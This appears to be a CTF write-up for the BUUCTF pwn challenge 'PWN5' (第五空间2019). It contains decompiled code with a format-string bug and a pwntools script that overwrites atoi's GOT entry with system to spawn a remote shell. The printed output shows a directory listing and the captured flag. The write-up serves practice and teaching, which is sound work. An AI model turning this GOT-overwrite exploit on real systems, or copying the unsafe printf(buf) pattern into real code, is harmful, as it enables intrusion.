q@ubuntu:~/buu/2019pwn5$ file pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6a8aa744920dda62e84d44fcc440c05f31c4c23d, stripped
q@ubuntu:~/buu/2019pwn5$ checksec pwn
[*] '/home/q/buu/2019pwn5/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
int __cdecl main(int a1)
{
int fd; // [esp+0h] [ebp-84h]
char nptr[16]; // [esp+4h] [ebp-80h] BYREF
char buf[100]; // [esp+14h] [ebp-70h] BYREF [ebp-70h] 大小为70h
fd = open("/dev/urandom", 0);
read(fd, &dword_804C044, 4u);
printf("your name:");
read(0, buf, 0x63u);//小于0x70 不存在栈溢出
printf("Hello,");
printf(buf);//没有格式化
printf("your passwd:");
read(0, nptr, 0xFu);
if ( atoi(nptr) == dword_804C044 )
{
puts("ok!!");
system("/bin/sh");
}
else
{
puts("fail");
}
result = 0;
if ( __readgsdword(0x14u) != v6 )
sub_80493D0();
return result;
}
from pwn import *
#io = process("./pwn")
io = remote("node4.buuoj.cn",25068)
elf = ELF('./pwn')
atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
payload=fmtstr_payload(10,{atoi_got:system_plt})
io.sendline(payload)
io.sendline(b'/bin/sh\x00')
io.interactive()
[*] Switching to interactive mode
your name:Hello, X c \x00a7\xc04\xc05\xc0
\x8d\xeyour passwd:$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
flag{c6848333-4abb-41a7-b138-01a2448b67e4}
![BUUCTF pwn [第五空间2019 决赛]PWN5](https://len3x3.xyz/wp-content/uploads/2022/09/wallhaven-zy5k5y.jpg)
![BUUCTF pwn [第五空间2019 决赛]PWN5](https://len3x3.xyz/wp-content/uploads/2022/09/wallhaven-zy5k5y-370x300.jpg)